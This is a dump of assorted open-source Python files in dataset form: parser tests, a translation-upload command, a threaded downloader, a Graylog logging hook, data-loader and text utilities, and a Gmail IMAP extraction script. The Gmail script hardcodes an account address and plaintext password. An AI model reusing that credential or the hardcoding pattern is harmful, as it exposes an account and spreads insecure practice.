headlines Parsing \"\"\"\n tp = product.TextProduct(get_file('AFDDMX.txt'))\n self.assertEqual(tp.segments[0].headlines,\n ['UPDATED FOR 18Z AVIATION DISCUSSION',\n 'Bogus second line with a new line'])\n\n def test_tml(self):\n \"\"\" Test TIME...MOT...LOC parsing \"\"\"\n ts = datetime.datetime(2012, 5, 31, 23, 10)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertEqual(tp.segments[0].tml_dir, 238)\n self.assertEqual(tp.segments[0].tml_valid, ts)\n self.assertEqual(tp.segments[0].tml_sknt, 39)\n self.assertEqual(tp.segments[0].tml_giswkt,\n 'SRID=4326;POINT(-88.53 32.21)')\n\n def test_bullets(self):\n \"\"\" Test bullets parsing \"\"\"\n tp = product.TextProduct(get_file('TORtag.txt'))\n self.assertEqual(len(tp.segments[0].bullets), 4)\n self.assertEqual(tp.segments[0].bullets[3],\n (\"LOCATIONS IMPACTED INCLUDE... MARYSVILLE...LOVILIA\"\n \"...HAMILTON AND BUSSEY.\"))\n\n tp = product.TextProduct(get_file('FLSDMX.txt'))\n self.assertEqual(len(tp.segments[2].bullets), 7)\n self.assertEqual(tp.segments[2].bullets[6],\n (\"IMPACT...AT 35.5 FEET...WATER AFFECTS 285TH \"\n \"AVENUE NEAR SEDAN BOTTOMS...OR JUST EAST OF THE \"\n \"INTERSECTION OF 285TH AVENUE AND 570TH STREET.\"))\n\n def test_tags(self):\n \"\"\" Test tags parsing \"\"\"\n tp = product.TextProduct(get_file('TORtag.txt'))\n self.assertEqual(tp.segments[0].tornadotag, \"OBSERVED\")\n self.assertEqual(tp.segments[0].tornadodamagetag, \"SIGNIFICANT\")\n\n def test_longitude_processing(self):\n ''' Make sure that parsed longitude values are negative! '''\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertAlmostEqual(tp.segments[0].sbw.exterior.xy[0][0], -88.39, 2)\n\n def test_giswkt(self):\n \"\"\" Test giswkt parsing \"\"\"\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertAlmostEqual(tp.segments[0].sbw.area, 0.16, 2)\n\n self.assertEqual(tp.segments[0].giswkt,\n ('SRID=4326;MULTIPOLYGON '\n '(((-88.390000 32.590000, -88.130000 32.760000, '\n '-88.080000 32.720000, -88.110000 32.690000, '\n '-88.040000 32.690000, -88.060000 32.640000, '\n '-88.080000 32.640000, -88.060000 32.590000, '\n '-87.930000 32.630000, -87.870000 32.570000, '\n '-87.860000 32.520000, -87.920000 32.520000, '\n '-87.960000 32.470000, -88.030000 32.430000, '\n '-88.050000 32.370000, -87.970000 32.350000, '\n '-87.940000 32.310000, -88.410000 32.310000, '\n '-88.390000 32.590000)))'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pyiem/nws/tests/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551184784","text":"from Products.CMFCore.utils import getToolByName\nPROFILE = 'profile-webcouturier.dropdownmenu:default'\n\n\ndef common(context):\n setup = getToolByName(context, 'portal_setup')\n setup.runAllImportStepsFromProfile(PROFILE)\n\n\ndef upgrade_1000_to_1010(context):\n \"\"\"If dropdownmenu_sunburst is after dropdownmenu in sunburst skin,\n reorder them\"\"\"\n skin = getToolByName(context, 'portal_skins')\n layers = skin.getSkinPath('Sunburst Theme').split(',')\n dds = layers.index('dropdownmenu_sunburst')\n dd = layers.index('dropdownmenu')\n if dds > dd:\n #switch them\n layers[dd] = 'dropdownmenu_sunburst'\n layers[dds] = 'dropdownmenu'\n path = ','.join(layers)\n skin.testSkinPath(path)\n sels = skin._getSelections()\n sels['Sunburst Theme'] = path\n","sub_path":"buildout-cache/eggs/webcouturier.dropdownmenu-2.3.1-py2.7.egg/webcouturier/dropdownmenu/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"213360040","text":"import os\nimport glob\nimport json\n\nimport requests\nfrom django.core.management.base import BaseCommand\nfrom django.utils.crypto import get_random_string\n\nfrom langusta_client import app_settings\nfrom langusta_client.exceptions import NoPoFilesFound\n\nfrom optparse import make_option\n\nIMPORT_ID_LENGTH = 40\n\n\nclass Command(BaseCommand):\n option_list = BaseCommand.option_list + (\n make_option(\n \"-H\", \"--host\", action=\"store\", type=\"string\", dest=\"host\"\n ),\n make_option(\n \"-W\", \"--auth-token\", action=\"store\", type=\"string\", dest=\"token\"\n ),\n make_option(\n \"-P\", \"--project-token\", action=\"store\", type=\"string\", dest=\"project\"\n ),\n make_option(\n \"-D\", \"--dry-run\", action=\"store_true\", dest=\"dry_run\", default=False\n ),\n make_option(\n \"-t\", \"--tag\", action=\"store\", type=\"string\", dest=\"tag\", default='master'\n ),\n make_option(\n \"-A\", \"--actualize\", action=\"store_true\", dest=\"actualize\", default=False\n )\n )\n\n def handle(self, *args, **options):\n self.debug = bool(options.get('dry_run'))\n self.env_tag = options.get('tag', '')\n self.actualize = options.get('actualize')\n self.upload_translation_file()\n\n @property\n def url(self):\n return \"{}/api/import/{}/{}/\".format(\n app_settings.LANGUSTA['HOST'],\n app_settings.LANGUSTA['PROJECT_SLUG'],\n app_settings.LANGUSTA['PROJECT_TOKEN']\n\n )\n\n def upload_translation_file(self):\n files = []\n for lang in app_settings.LANGUSTA['LANGUAGES']:\n source_folder = os.path.join(\n app_settings.LANGUSTA['SOURCE_PATH'], lang, 'LC_MESSAGES'\n )\n files += [filepath for filepath in glob.glob(source_folder + '/*.po')]\n if not files:\n raise NoPoFilesFound(\n 'Could not find any .po files in %r' % (source_folder,)\n )\n print('Translations found:\\n', '\\n'.join(files))\n\n # Used to group all translations as one import event\n langusta_import_id = get_random_string(IMPORT_ID_LENGTH)\n\n for _filePath in files:\n filePath, domain = os.path.split(_filePath)\n language = filePath.split('/')[-2]\n print('Uploading, language: {}, domain: {}'.format(language,\n domain))\n\n content = open(_filePath, 'r').read()\n data = {\n 'project_slug': app_settings.LANGUSTA['PROJECT_SLUG'],\n 'content': content,\n 'tags': [self.env_tag],\n 'domain': domain,\n 'language': language,\n 'import_id': langusta_import_id,\n 'actualize': self.actualize,\n }\n\n headers = {\n 'content-type': 'application/json',\n 'Authorization': 'Token {}'.format(app_settings.LANGUSTA['AUTH_TOKEN'])\n }\n\n if not self.debug:\n response = requests.post(\n self.url,\n data=json.dumps(data), headers=headers\n )\n try:\n response.raise_for_status()\n except IOError:\n if response.headers.get('content-type') == 'application/json':\n print(response.json())\n raise\n","sub_path":"langusta_client/management/commands/ln_push.py","file_name":"ln_push.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"224135661","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 13/03/2018 10:32 AM\n# @Author : Fish\n# @Site : \n# @File : download.py\n# @Software: PyCharm\n\nimport threading\nimport requests\nfrom component import proxy, utility\n\n\nclass Downloader(object):\n def __init__(self,video_name,url):\n proxy.set_proxy()\n self.dir_name = utility.mk_download_dir()\n self.name = video_name + '.mp4'\n self.url = url\n self.num = 8\n session = requests.Session()\n r = session.get(self.url, headers=utility.set_header())\n # 获取文件大小\n self.total = int(r.headers['Content-Length'])\n print('总共: ',self.total)\n\n # 获取每个线程下���的区间\n def get_range(self):\n ranges = []\n offset = int(self.total/self.num)\n for i in range(self.num):\n if i == self.num-1:\n ranges.append((i*offset,''))\n else:\n ranges.append((i*offset,(i+1)*offset))\n return ranges # [(0,100),(100,200),(200,\"\")]\n\n # 通过传入开始和结束位置来下载文件\n def download(self,start,end):\n headers = {'Range':'Bytes=%s-%s'%(start,end),'Accept-Encoding':'*'}\n mxheader = utility.set_header()\n headers.update(mxheader)\n # print(headers)\n res = requests.get(self.url,headers=headers)\n print (\"%s-%s download success\"%(start,end))\n # 将文件指针移动到传入区间开始的位置\n self.fd.seek(start)\n self.fd.write(res.content)\n\n def run(self):\n self.fd = open(self.dir_name + '/' + self.name,\"wb\")\n\n thread_list = []\n n = 0\n\n for ran in self.get_range():\n # 获取每个线程下载的数据块\n start,end = ran\n n += 1\n thread = threading.Thread(target=self.download,args=(start,end))\n thread.start()\n thread_list.append(thread)\n\n for i in thread_list:\n # 设置等待,避免上一个数据块还没写入,下一数据块对文件seek,会报错\n i.join()\n\n self.fd.close()\n\nif __name__ == \"__main__\":\n Downloader().run()\n","sub_path":"component/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"69723664","text":"\"\"\"\n=================================\n\nThis file is from the Greylog plugin for NavalBot.\nCopyright (C) 2016 Isaac Dickinson\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see <http://www.gnu.org/licenses/>\n\n=================================\n\"\"\"\n\n# Graylog plugin.\n# Sends JSON logs to Graylog.\nimport logging\nimport json\nimport asyncio\n\nfrom navalbot.api import hooks, util\n\nVERSION = \"1.0.0\"\n\nlogger = logging.getLogger(\"NavalBot\")\n\ngraylog_params = util.get_global_config(\"graylog\")\naddr, port = graylog_params[\"addr\"], graylog_params[\"port\"]\n\np = {\"r\": None, \"w\": None}\n\n\nasync def send(data: str):\n if not p[\"r\"]:\n try:\n p[\"r\"], p[\"w\"] = await asyncio.open_connection(addr, port)\n except ConnectionRefusedError:\n logger.critical(\"Could not connect to Graylog on {}!\".format((addr, port)))\n return\n else:\n logger.info(\"Established connection to Graylog.\")\n # write\n data += \"\\n\"\n p[\"w\"].write(data.encode())\n\n\n@hooks.on_generic_event\nasync def send_to_graylog(data: dict):\n \"\"\"\n Sends something to Graylog.\n\n Encodes the data into json.\n \"\"\"\n # Flatten out the data.\n new_d = data.get(\"d\", {})\n # Add an 'event' param\n new_d['event'] = data.get('t', \"ERR_UNKNOWN\")\n # json encode it\n to_send = json.dumps(new_d)\n # Send the data.\n await send(to_send)\n logger.info(\"Sent `{}` to Graylog.\".format(new_d['event']))\n # Close the old connection\n","sub_path":"nsa.py","file_name":"nsa.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644419173","text":"from torch.utils import data\n\n\ndef run_pipeline(in_dict, pipeline):\n \"\"\"\n 按照顺序执行pipeline中各个方法\n :param in_dict: 一个dict,负责储存pipeline的输入(包含第一个method的输入key即可)\n :param pipeline: 要执行的pipeline\n :return: 一个dict,即pipeline中最后一个method的输出\n \"\"\"\n # 取出第一个method的in_key的东西,放到一个新的dict\n tmp_dict = {}\n for _key in pipeline[0]['in_key']:\n tmp_dict[_key] = in_dict[_key]\n for method in pipeline:\n if method['method'] is not None:\n tmp_dict = method['method'](**tmp_dict)\n else: # 如果为None,则有传递(or重新命名)的作用\n _tmp_dict = {}\n for _index, _key in enumerate(method['out_key']):\n _tmp_dict[_key] = tmp_dict[method['in_key'][_index]]\n tmp_dict = _tmp_dict\n return tmp_dict\n\ndef chechout_pipeline(pipeline):\n \"\"\"\n 检查pipeline中各个方法的一致性,即输���输出能否串联上,\n 如果方法为 None,则只是传递作用,对应的in_key和out_key必须一致\n :param pipeline:\n :return:\n \"\"\"\n step_num = len(pipeline)\n # 首先检查输入输出能否串联上\n for index in range(step_num-1):\n method = pipeline[index]\n next_method = pipeline[index+1]\n # print('checking method: t method ',str(method['method']),\n # ' t+1 method ', str(next_method['method']))\n if method['out_key'] != next_method['in_key']:\n raise ValueError('out_keys do not match in_key')\n # 其次检查None方法是否in和out数量一致\n for method in pipeline:\n if method['method'] is None:\n if len(method['in_key']) != len(method['out_key']):\n raise ValueError('None_method must have the same length of in_key and out_keys')\n return 1\n\n\nclass wama_dataset(data.Dataset):\n def __init__(self, input_dict_list, pipeline_list):\n \"\"\"\n :param input_dict_list: 是一个list,每个element是一个sample\n :param pipeline_list: 由许多个pipeline构成的list,会依次执行其中的pipeline\n :param mode:\n \"\"\"\n\n self.input_dict_list = input_dict_list\n self.pipeline_list = pipeline_list\n\n def __len__(self):\n return len(self.input_dict_list)\n\n def __getitem__(self, index):\n # 取出一个sample\n indict = self.input_dict_list[index]\n # 提前构造返回值,也是个dict结构\n out_dict = {}\n # 一次调用pipeline_list中的各个pipeline\n for pipeline in self.pipeline_list:\n # 检查pipeline\n chechout_pipeline(pipeline)\n # 执行pipeline\n tmp_dict = run_pipeline(in_dict=indict, pipeline=pipeline)\n # 储存结果(or覆盖之前pipeline的某些结果)\n out_dict.update(tmp_dict)\n\n # 注意,out_dict中每一个值只能为‘字符串’,值和数组(torch限制),注意自查\n return out_dict\n\n\n\ndef get_loader(input_dict_list, pipeline_list, num_workers = 0, pin_memory=False, batch_size = 3, drop_last = True):\n dataset = wama_dataset(input_dict_list=input_dict_list, pipeline_list=pipeline_list)\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=drop_last,\n pin_memory=pin_memory)\n return data_loader\n","sub_path":"proj/wama/data_loader_beta.py","file_name":"data_loader_beta.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"4074084","text":"# Written 23/05/17 by dh4gan\n# Class for the Sail Object\n\nimport vector\nfrom numpy import cos\n\n# Some useful physical constants\n\nAU = AU = (149.6e6 * 1000)\n\n# Sun\nsun_radius = 695700000 # [m]\nsun_mass = 1.989 * 10**30 # [kg]\nsun_luminosity = 3.86 * 10**26 # [Watt] stellar luminosity\nsun_Bfield_1AU = 5.0e-9 # Solar magnetic field strength at 1 AU (Tesla)\n\n# CenA:\nL_star_CenA = sun_luminosity * 1.522\nR_star_CenA = sun_radius * 1.224\nM_star_CenA = sun_mass * 1.105\n\n# CenB:\nL_star_CenB = sun_luminosity * 0.503\nR_star_CenB = sun_radius * 0.863\nM_star_CenB = sun_mass * 0.934\n\n# CenC:\nL_star_CenC = sun_luminosity * 138 * 10e-6\nR_star_CenC = sun_radius * 0.145\nM_star_CenC = sun_mass * 0.123\n\n\n\nclass Star(object):\n \n \n def __init__(self,m,R,L,B,pos,vel,magmom=vector.Vector3D(0.0,0.0,1.0)):\n '''Initialises star with mass, radius, B-field, position, velocity'''\n self.M = m\n self.R = R\n self.L = L\n self.B1AU = B\n self.position = pos\n self.velocity = vel\n self.magmoment = magmom\n \n def __str__(self):\n s= 'Star: mass %e radius %e luminosity %e\\n' % (self.M/sun_mass, self.R/sun_radius, self.L/sun_luminosity)\n s = s+\"Position: \"+str(self.position)+\"\\n\"\n s = s+\"Velocity: \"+str(self.velocity)+\"\\n\"\n s = s+\"Mag Moment: \"+str(self.magmoment)+\"\\n\"\n return s\n \n def get_magnetic_field_dipole(self,position):\n '''Returns a spherically symmetric dipole magnetic field\n NB: Calculated in 3D'''\n\n sepvector = position.subtract(self.position).scalarmult(1.0/AU)\n \n sep = sepvector.mag()\n sep2 = sep*sep\n sep3 = sep2*sep\n \n sepvector = sepvector.unitVector()\n \n mdotr = self.magmoment.dot(sepvector)\n \n prefac = self.B1AU/sep3\n \n Bfield = sepvector.scalarmult(3.0*prefac*mdotr)\n Bfield = Bfield.subtract(self.magmoment.scalarmult(prefac))\n\n return Bfield\n \n \n ","sub_path":"star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644438761","text":"import json\nimport random\n\nwith open(\"data.json\") as file:\n data = json.load(file)\n\ndef stringify(string):\n # This function removes characters that are inside the 'unwanted_chars' from the 'string' arguement\n word = []\n newString = \"\"\n unwanted_chars = [\"!\", \"?\", \".\", \",\", \"(\", \")\", \"&\", \";\", '\"', \"'\", \"@\"]\n stringLength = len(string)\n\n for char in string:\n word.append(char)\n for unwanted_char in unwanted_chars:\n if unwanted_char in word:\n stringLength -= len(unwanted_char)\n index = word.index(unwanted_char)\n word.pop(index)\n\n for char in word:\n newString += char\n return newString # ==> newstring is the string remove all those symbols\n\nrunning = True\nwhile running:\n userInput = input('> ')\n stringify(userInput)\n print(userInput)\n response = \"\"\n for dict in data['data']:\n for pattern in dict['input_pattern']:\n if userInput == pattern:\n resp = random.choice(dict['response'])\n print(resp)\n\n if userInput in data[\"exit\"][\"exit_pattern\"]:\n running = False\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"592844832","text":"# -*- coding:utf-8 -*-\n\nimport uuid\n\nfrom .fs import read_file\nfrom .date import now\nfrom .date import timestamp\n\n\ndef load_data(file):\n u\"\"\"加载数据\n\n Parameters\n ----------\n file : str\n 文件路径\n\n Returns\n -------\n list\n\n \"\"\"\n text = read_file(file)\n\n if text is None:\n return []\n\n lines = text.split(\"\\n\")\n\n return [line.strip() for line in lines if line.strip() != \"\"]\n\n\ndef load_dict(file, mode=\"list\"):\n u\"\"\"加载词典\n\n Parameters\n ----------\n file : str\n 文件路径\n mode : {\"list\", \"set\"}, optional, default=\"list\"\n 类型\n\n Returns\n -------\n {list, set}\n\n [\"啊\", \"呀\"]\n {\"啊\", \"呀\"}\n\n \"\"\"\n words = load_data(file)\n\n if mode == \"set\":\n words = set(words)\n\n return words\n\n\ndef load_syn_dict(file, mode=\"list\"):\n u\"\"\"加载替换词典\n\n Parameters\n ----------\n file : str\n 文件路径\n mode : {\"list\", \"set\"}, optional, default=\"list\"\n 类型\n\n Returns\n -------\n {[[str]], {str : set}}\n\n \"\"\"\n lines = load_data(file)\n\n if mode == \"set\":\n syn_dict = {}\n\n for line in lines:\n line_splited = line.split()\n word = line_splited[0]\n if word not in syn_dict:\n syn_dict[word] = set()\n syn_dict[word] = syn_dict[word] | set(line_splited[1:]) # key重复会\n else:\n syn_dict = [\n line.split()\n for line in lines]\n\n return syn_dict\n\n\ndef clean_text(text, word_dict):\n u\"\"\"替换文档里的词\n\n Parameters\n ----------\n text : str\n 待替换的文本\n word_dict : list\n 词典\n\n Returns\n -------\n str\n\n \"\"\"\n for item in word_dict:\n new = item[0]\n for old in item[1:]:\n text = text.replace(old, new)\n\n return text\n\n\ndef clean_word(word, word_dict, mode=\"list\"):\n u\"\"\"替换词\n\n Parameters\n ----------\n word : str\n 待替换的词\n word_dict : {list, dict}\n 词典\n mode : {\"list\", \"set\"}, optional, default=\"list\"\n 类型\n\n Returns\n -------\n str\n\n Notes\n -----\n 同一个词只会匹配一次\n \"\"\"\n if mode == \"set\":\n for item in word_dict:\n if word in word_dict[item]:\n return item\n else:\n for item in word_dict:\n if word in item:\n return item[0]\n\n return word\n\n\ndef generate_name(mode=\"time\"):\n u\"\"\"命名\n\n Parameters\n ----------\n mode : {\"time\", \"uuid\", \"timestamp\"}, optional, default=\"time\"\n 类型\n\n Returns\n -------\n str\n\n \"\"\"\n if mode == \"uuid\":\n return str(uuid.uuid1())\n elif mode == \"timestamp\":\n return str(timestamp())\n else:\n return now(\"%Y%m%d%H%M%S\")\n","sub_path":"nlptools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"245733488","text":"import imaplib\nimport email\nmail = imaplib.IMAP4_SSL('imap.gmail.com')\n#imaplib module implements connection based on IMAPv4 protocol\nmail.login(' upfeatemailproject@gmail.com', 'Ouvert2019')\n\nmail.list() #lists all labels in gmail\nmail.select('inbox') #connect to inbox\n\n\n#Fetching the latest emails\nresult, data = mail.uid('search',None, \"ALL\") #search and return uids instead\n\ni = len(data[0].split())\nfor x in range(i):\n latest_email_uid = data[0].split()[x] #get the latest\n\n result, email_data = mail.uid('fetch',latest_email_uid, '(RFC822)') #Fetch\n\n raw_email = email_data[0][1] #here's the body, which is raw text of\n #including headers and alternate payloads\n\nraw_email_string = raw_email.decode('utf-8')\n#converts byte literal to string removing b''\nemail_message = email.message_from_string(raw_email_string)\n#loop in all the the avail multipart in the emails\nfor part in email_message.walk():\n if part.get_content_type() == \"text/plain\": #ignore attachments/html\n body = part.get_payload(decode=True)\n save_string = str(\"D:Dumpgmailemail_\" + str(x) + \".txt\")\n #locate on disk\n myfile = open(save_string, 'a')\n myfile.write(body.decode('utf-8'))\n #body is again a byte literal\n myfile.close()\n else:\n continue\n","sub_path":"e_excell_project/extraction_email.py","file_name":"extraction_email.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"615939017","text":"#题目:判断101-200之间有多少个素数,并输出所有素数。\n#程序分析:判断素数的方法:用一个数分别去除2到sqrt(这个数),如果能被整除,则表明此数不是素数,反之是素数。 \nimport math\n\ndef su(n):\n m = int(math.sqrt(n))\n for i in range(2,m):\n if n % i == 0:\n break\n return n\n\nfor i in range(101,200):\n print(su(i))","sub_path":"Python3/python100/12.0.py","file_name":"12.0.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"247032815","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nimport mpl_toolkits.mplot3d.axes3d as p3\r\nfrom matplotlib import style\r\n\r\nstyle.use('fivethirtyeight')\r\nfig = plt.figure()\r\n# ax1 = fig.add_subplot(1,1,1) # for 2d Plotting\r\nax1 = p3.Axes3D(fig) # for 3D plotting\r\n\r\n\r\ndef animate(i):\r\n file_data = open('rotation_matrix_demo.txt', 'r').read() # read the file, associate with a file pointer/ object\r\n # print(file_data)\r\n lines = file_data.split('\\n') ## read all lines, split with \\n and store in a list\r\n roll = lines[0].split(':') # lines[0] stores 1st line in file. roll becomes a list, split by :\r\n pitch = lines[1].split(':')\r\n yaw = lines[2].split(':')\r\n\r\n # print(roll[1])\r\n # print(pitch[1])\r\n # print([1])\r\n\r\n phi = float(roll[1]) # phi is the 2nd value in te roll list, this a string and is converted to float\r\n theta = float(pitch[1])\r\n psi = float(yaw[1])\r\n\r\n # print(phi,' ',theta,' ',psi, type(phi))\r\n vector = np.array([2,5,0]) # input arbitary vector/ point.\r\n t = rotate_z(psi,vector) # cal new position and return vector\r\n\r\n ax1.clear() # clears the plot every iteration\r\n ax1.plot([0,vector[0]],[0,vector[1]], [0,0],'b') # plot input arbitary vector\r\n ax1.plot([0, t[0]], [0, t[1]], [0,0], 'r') # plot repositioned vector\r\n # ax1.set_aspect('equal', 'box') # make the axis equal\r\n # ax1.axis([-10,10,-10,10]) # set limits on axis.\r\n\r\n\r\n # Setting the axes properties\r\n ax1.set_xlim3d([-10.0, 10.0])\r\n ax1.set_xlabel('X')\r\n ax1.set_ylim3d([-10.0, 10.0])\r\n ax1.set_ylabel('Y')\r\n ax1.set_zlim3d([-10.0, 10.0])\r\n ax1.set_zlabel('Z')\r\n ax1.set_title('3D Test')\r\n\r\n\r\n\r\n\r\ndef rotate_z(psi, v):\r\n psi_d = psi * np.pi/180.0 # convert deg to radians.\r\n mat_z = np.array([[np.cos(psi_d), - np.sin(psi_d), 0],\r\n [np.sin(psi_d), np.cos(psi_d), 0],\r\n [0 , 0, 1]])\r\n m = np.matmul(mat_z,v) # perform mat mul\r\n\r\n print(m)\r\n return m\r\n\r\n\r\n\r\nani = animation.FuncAnimation(fig, animate, interval=100)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"rotation_matrix_demo.py","file_name":"rotation_matrix_demo.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"221853120","text":"\"\"\"\r\nUm funcionário de uma empresa recebe aumento salarial anualmente: Sabe-se que:\r\nEsse funcionário foi contratado em 1995, com salário inicial de R$ 1.000,00;\r\nEm 1996 recebeu aumento de 1,5% sobre seu salário inicial;\r\nA partir de 1997 (inclusive), os aumentos salariais sempre correspondem ao dobro do percentual do ano anterior.\r\nFaça um programa que determine o salário atual desse funcionário.\r\nApós concluir isto, altere o programa permitindo que o usuário digite o salário inicial do funcionário.\r\n\"\"\"\r\nfrom datetime import datetime\r\n\r\nhoje = datetime.now().year # ano atual\r\n\r\nwhile True:\r\n try:\r\n salario = float(input('Salario: R$'))\r\n break\r\n except ValueError:\r\n print('Valor inválido!\\n')\r\n\r\ntaxa_aum = 0.015\r\n\r\nnovo_salario = salario * (1 + taxa_aum)\r\n\r\nfor s in range(1997, hoje + 1):\r\n taxa_aum *= 2\r\n novo_salario += salario * (1 + taxa_aum)\r\n\r\nprint(f'O salario atual é de R${novo_salario:.2f}')\r\n","sub_path":"03_Estrutura_de_Repeticao/38-AumentoDeSalario.py","file_name":"38-AumentoDeSalario.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"424687789","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('webAPI', '0007_auto_20141119_1452'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='panel_reading',\n name='created',\n field=models.DateTimeField(default=datetime.datetime(2014, 11, 19, 14, 58, 43, 789126, tzinfo=utc), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='panel_reading',\n name='timestamp',\n field=models.DateTimeField(null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"server/slipserver/webAPI/migrations/0008_auto_20141119_1458.py","file_name":"0008_auto_20141119_1458.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"39255737","text":"import logging\n\nfrom flask_restplus import Resource, reqparse\n\n\nclass Index(Resource):\n def get(self):\n return {\n \"description\": \"Currency exchange API\",\n \"version\": self.api.app.config[\"VERSION\"]\n }\n\n\nclass SupportedCurrencies(Resource):\n def get(self):\n return {\n \"supported_currencies\": self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n }\n\n\nclass Quote(Resource):\n def __init__(self, *args, **kwargs):\n super(Quote, self).__init__(*args, **kwargs)\n self.client = self.api.app.exchange_client\n self.parser = reqparse.RequestParser()\n self.parser.add_argument(\n \"from_currency_code\",\n type=str,\n required=True,\n choices=self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n )\n self.parser.add_argument(\n \"to_currency_code\",\n type=str,\n required=True,\n choices=self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n )\n self.parser.add_argument(\n \"amount\",\n type=int,\n required=True\n )\n\n def get(self):\n args = self.parser.parse_args()\n from_currency = args[\"from_currency_code\"]\n to_currency = args[\"to_currency_code\"]\n amount = args[\"amount\"]\n try:\n exchange_rate = self.client.get_exchange_rate(from_currency, to_currency)\n except Exception as e:\n logging.log(logging.ERROR, e)\n return {\"error\": \"Could not get exchange rates\"}, 502\n return {\n \"exchange_rate\": round(exchange_rate, 3),\n \"amount\": round(amount * exchange_rate),\n \"currency_code\": to_currency,\n }\n","sub_path":"api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"188840259","text":"# Tai Sakuma <tai.sakuma@gmail.com>\nimport pytest\nimport time\nimport multiprocessing\n\ntry:\n import unittest.mock as mock\nexcept ImportError:\n import mock\n\nfrom alphatwirl.progressbar import ProgressReportPickup\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef presentation():\n return mock.MagicMock()\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef queue():\n return multiprocessing.Queue()\n\n@pytest.fixture()\ndef pickup(queue, presentation):\n return ProgressReportPickup(queue, presentation)\n\n##__________________________________________________________________||\ndef test_start_join(pickup, queue, presentation):\n presentation.active.return_value = True\n pickup.start()\n queue.put(None)\n pickup.join()\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mock_queue():\n return mock.MagicMock()\n\n@pytest.fixture()\ndef pickup0(mock_queue, presentation):\n return ProgressReportPickup(mock_queue, presentation)\n\n##__________________________________________________________________||\ndef test_run_until_the_end_order_arrives_no_report(pickup0, mock_queue, presentation):\n\n mock_queue.empty.side_effect = [False, True]\n mock_queue.get.side_effect = [None]\n pickup0._run_until_the_end_order_arrives()\n\n assert [] == presentation.mock_calls\n\ndef test_run_until_the_end_order_arrives_one_report(pickup0, mock_queue, presentation):\n\n report = mock.MagicMock()\n mock_queue.empty.side_effect = [False, False, True]\n mock_queue.get.side_effect = [report, None]\n pickup0._run_until_the_end_order_arrives()\n\n assert [mock.call.present(report)] == presentation.mock_calls\n\ndef test_run_until_the_end_order_arrives_one_report_once_empty(pickup0, mock_queue, presentation):\n\n report1 = mock.MagicMock()\n mock_queue.empty.side_effect = [False, True, False, True] # it becomes empty once\n mock_queue.get.side_effect = [report1, None]\n pickup0._run_until_the_end_order_arrives()\n\n assert [mock.call.present(report1)] == presentation.mock_calls\n\ndef 